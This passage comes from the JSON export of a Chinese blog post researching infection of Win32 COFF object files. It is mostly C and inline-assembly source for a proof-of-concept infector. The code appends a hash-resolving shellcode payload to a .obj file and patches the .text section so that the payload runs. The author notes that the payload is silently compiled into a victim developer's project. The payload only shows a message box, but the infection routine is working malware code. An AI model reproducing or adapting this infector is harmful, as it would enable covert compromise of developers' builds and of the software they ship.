sizeof(reloc_s);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t\/\/ \u6784\u9020\u4e00\u4e2a\u65b0\u7684obj\u7f13\u51b2\u533a\r\n\tvir_size = (int)((int)&amp;vir_code_end - (int)&amp;vir_code);\r\n\r\n\ta_size   = f_size + vir_size + tx_rel_len + 1;\r\n\tbuf      = (unsigned char *)malloc(a_size);\r\n\r\n\tmemset(buf,0,f_size + vir_size 
+1);\r\n\r\n\tfseek(h,0,SEEK_SET);\r\n\tfread(buf,sizeof(unsigned char),f_size,h);\r\n\tfclose(h);\r\n\th = 0;\r\n\r\n\t\/\/ \u4fee\u6539text\u8282\u7684\u6267\u884c\r\n\t\/\/ \u5c06\u539f\u6709.text\u6570\u636e\u5b9a\u4f4d\u7684\u6587\u4ef6\u5c3e\u90e8\r\n\r\n\tprintf(\"buff + f_size :%0x\r\n\",buf + f_size);\r\n\tmemcpy(buf + f_size,buf + txt_off,txt_len);\r\n\r\n\t\/\/ copy\u91cd\u5b9a\u4f4d\u8868\r\n\tmemcpy(buf + f_size + txt_len,buf + tx_rel_off,tx_rel_len);\r\n\r\n\t\/\/ copy virus\r\n\tmemcpy(buf + f_size + txt_len + tx_rel_len,vir_code,vir_size);\r\n\r\n\t\/\/ \u4fee\u6539.text\u8282\u4ee3\u7801\u504f\u79fb\r\n\t\/\/sh.ul_sec_size\r\n\t(*(unsigned long *)(buf + tx_off + 8 + 4 + 4))     = txt_len + vir_size + 9;\r\n\t\/\/sh.ul_sec_off\r\n\t(*(unsigned long *)(buf + tx_off + 8 + 4 + 4 + 4)) = f_size;\r\n\r\n\t\/\/ \u4fee\u6539\u539f\u6709ret\u6307\u4ee4\uff0c\u8df3\u8fc7\u91cd\u5b9a\u4f4d\u8868\uff0c\u6b64\u5904\u9700\u8981\u53cd\u6c47\u7f16\u5f15\u64ce\u652f\u6301\uff0c\u641c\u7d220xc3\uff0c\u5b9a\u4f4d\u8981\u4fee\u6539\u7684jmp \u4f4d\u7f6e\uff0cPOC\u6f14\u793a\u76f4\u63a5\u5b9a\u4f4d.\r\n\r\n\t(*(unsigned char *)(buf + f_size + 0x0b)) = 0xeb;\r\n\t(*(unsigned long *)(buf + f_size + 0x0c)) = (txt_len - 0xc) + tx_rel_len - 1;\r\n\r\n\t\/\/ \u52a0\u5165ret\u6307\u4ee4\u8fd4\u56de\uff0c\u6216\u8df3\u8f6c\u4f1a\u5bbf\u4e3b\r\n\t\/\/ ...\r\n\r\n\t\/\/ \u5199\u5165\u4e00\u4e2a\u65b0\u7684obj\r\n\tif(0 ==(h = fopen(\"t_obj.obj\",\"wb\")))\r\n\t{\r\n\t\tprintf(\"the file t_obj.obj was not created\r\n\");\r\n\t\treturn 0;\r\n\t}\r\n\tfwrite(buf,sizeof(unsigned char),a_size,h);\r\n\tfclose(h);\r\n\treturn 1;\r\n}\r\n__declspec(naked) void vir_code(void)\r\n{\r\n\t_asm{\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tCLD               ; clear flag DF\r\n\t\t\t                  ;store hash\r\n\t\t\tpush 0x1e380a6a   ;hash of MessageBoxA\r\n\t\t\tpush 0x4fd18963   ;hash of 
ExitProcess\r\n\t\t\tpush 0x0c917432   ;hash of LoadLibraryA\r\n\t\t\tmov esi,esp       ; esi = addr of first function hash\r\n\t\t\tlea edi,[esi-0xc] ; edi = addr to start writing function\r\n\t\t\t; make some stack space\r\n\t\t\txor ebx,ebx\r\n\t\t\tmov bh, 0x04\r\n\t\t\tsub esp, ebx\r\n                        ; push a pointer to \"user32\" onto stack\r\n\t\t\tmov bx, 0x3233    ; rest of ebx is null\r\n\t\t\tpush ebx\r\n\t\t\tpush 0x72657375\r\n\t\t\tpush esp \r\n\r\n\t\t\txor edx,edx\r\n\t\t\t; find base addr of kernel32.dll\r\n\t\t\tmov ebx, fs:[edx + 0x30]\r\n\t\t\tmov ecx, [ebx + 0x0c]\r\n\t\t\tmov ecx, [ecx + 0x1c]\r\n\t\t\tmov ecx, [ecx]\r\n\t\t\tmov ebp, [ecx + 0x08]\r\n\t\tfind_lib_functions: \r\n\r\n\t\t\tlodsd\r\n\t\t\tcmp eax, 0x1e380a6a\t\t    \r\n\r\n\t\t\tjne find_functions\r\n\t\t\txchg eax, ebp\r\n\t\t\tcall [edi - 0x8]\r\n\t\t\txchg eax, ebp \t\t\t       \r\n\r\n\t\tfind_functions:\r\n\t\t\tpushad\r\n\t\t\tmov eax, [ebp + 0x3c]\r\n\t\t\tmov ecx, [ebp + eax + 0x78]\r\n\t\t\tadd ecx, ebp\r\n\t\t\tmov ebx, [ecx + 0x20]\r\n\t\t\tadd ebx, ebp\r\n\t\t\txor edi, edi \t\t\t\t     \r\n\r\n\t\tnext_function_loop:\r\n\t\t\tinc edi\r\n\t\t\tmov esi, [ebx + edi * 4]\r\n\t\t\tadd esi, ebp\r\n\t\t\tcdq \t\t\t\t\t\t           \r\n\r\n\t\thash_loop:\r\n\t\t\tmovsx eax, byte ptr[esi]\r\n\t\t\tcmp al,ah\r\n\t\t\tjz compare_hash\r\n\t\t\tror edx,7\r\n\t\t\tadd edx,eax\r\n\t\t\tinc esi\r\n\t\t\tjmp hash_loop\r\n\r\n\t\tcompare_hash:\r\n\t\t\tcmp edx, [esp + 0x1c]\r\n\t\t\tjnz next_function_loop \r\n\r\n\t\t\tmov ebx, [ecx + 0x24]\r\n\t\t\tadd ebx, ebp\r\n\t\t\tmov di, [ebx + 2 * edi]\r\n\t\t\tmov ebx, [ecx + 0x1c]\r\n\t\t\tadd ebx, ebp\r\n\t\t\tadd ebp, [ebx + 4 * edi]  \r\n\r\n\t\t\txchg eax, ebp\r\n\t\t\tpop edi\r\n\t\t\tstosd\r\n\t\t\tpush edi\r\n\t\t\tpopad\r\n\t\t\tcmp eax,0x1e380a6a\r\n\t\t\tjne find_lib_functions \r\n\r\n\t\tfunction_call:\r\n\t\t\txor ebx,ebx\r\n\t\t\tpush ebx              \/\/ cut string\r\n\t\t\tpush 0x00726574       \/\/ show 
Win32.Swelter\r\n\t\t\tpush 0x6C657753\r\n\t\t\tmov eax,esp           \/\/load address of Swelter\r\n\t\t\tpush ebx\r\n\t\t\tpush eax\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tcall [edi - 0x04]     \/\/call MessageboxA\r\n\t\t\tpush ebx\r\n\t\t\tcall [edi - 0x08]     \/\/ call ExitProcess\r\n\t\t\tret\r\n\t}\r\n}\r\n__declspec(naked) void vir_code_end(void)\r\n{\r\n\r\n}\r\n\/\/------------------------------------------------------------------------------\r\n\r\n[0x06] .\u5176\u5b83\r\n\r\n    \u5173\u4e8e\u611f\u67d3\u7684\u65b9\u5f0f\u8fd8\u6709\u5f88\u591a\u4e2d\u65b9\u6cd5\uff0c\u6bd4\u5982\u5229\u7528\u91cd\u5b9a\u4f4d\u8868\uff0c\u6784\u9020\u4e00\u4e2a\u52a0\u8f7d\u540e\u80fd\u8df3\u8f6c\u5230virus code\r\n\u503c\uff0c\u611f\u5174\u8da3\u7684\u670b\u53cb\u53ef\u4ee5\u53bb\u5c1d\u8bd5\u4e0b\uff0ccoff - obj\u7684\u611f\u67d3\u6761\u4ef6\u6bd4\u8f83\u82db\u523b\uff0c\u81f3\u5c11\u8981\u5728\u6709\u7f16\u8bd1\u5668\u7684\u673a\r\n\u5668\u4e0a\u641c\u7d22\u5230\u6709obj\u624d\u884c\uff0c\u5e76\u4e14\u6ca1\u6709\u505arebuild all \u64cd\u4f5c\uff0c\u800c\u662f\u76f4\u63a5\u7f16\u8bd1\u94fe\u63a5\u4ee3\u7801\uff0c\u8fd9\u6837\u624d\u4f1a\u795e\r\n\u4e0d\u77e5\u9b3c\u4e0d\u89c9\u7684\u628a\u75c5\u6bd2\u4ee3\u7801\u7f16\u8bd1\u8fdb\u81ea\u5df1\u7684\u5de5\u7a0b\u91cc\u9762\u6765\u3002\r\n\r\n    \u7531\u4e8e\u5bf9\u94fe\u63a5\u5668\u539f\u7406\u7406\u89e3\u4e0d\u591f\u6df1\u5165\u53ca\u5bf9coff\u6587\u4ef6\u683c\u5f0f\u672c\u8eab\u7406\u89e3\u4e0d\u51c6\u7684\u5730\u65b9\u53ef\u80fd\u5bfc\u81f4\u672c\u6587\u5b58\r\n\u5728\u63cf\u8ff0\u4e2d\u5b58\u5728\u758f\u6f0f\uff0c\u5982\u679c\u6709\u4ec0\u4e48\u95ee\u9898\u7ed9mail\u6211\uff0cneineit@gmail.com\uff0c\u6b22\u8fce\u4ea4\u6d41\u6307\u6b63\u3002\r\n\r\n\u9644\u53c2\u8003\u6587\u732e\uff1a\r\n\r\n[1] Matt Pietrek.    \u300aLinker Algorithm\u300b\r\n[2] John R. Levine.  \u300aLinkers &amp; Loaders\u300b\r\n[3] coff \u683c\u5f0f.        http:\/\/baike.baidu.com\/view\/1240794.htm\r\n[4] failwest.        
\u300ashellcode_popup_general\u300b<\/pre>\n<p><a href=\"http:\/\/www.80vul.com\/webzine_0x05\/attachment\/Win32%20coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76.rar\">\u9644\u4ef6\u4e0b\u8f7d<\/a><\/p>\n<pre>-EOF-<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76 By nEINEI [\u76ee\u5f55] [0 &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/404.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[160,159],"class_list":["post-404","post","type-post","status-publish","format-standard","hentry","tag-coff-obj","tag-win32"],"views":822,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}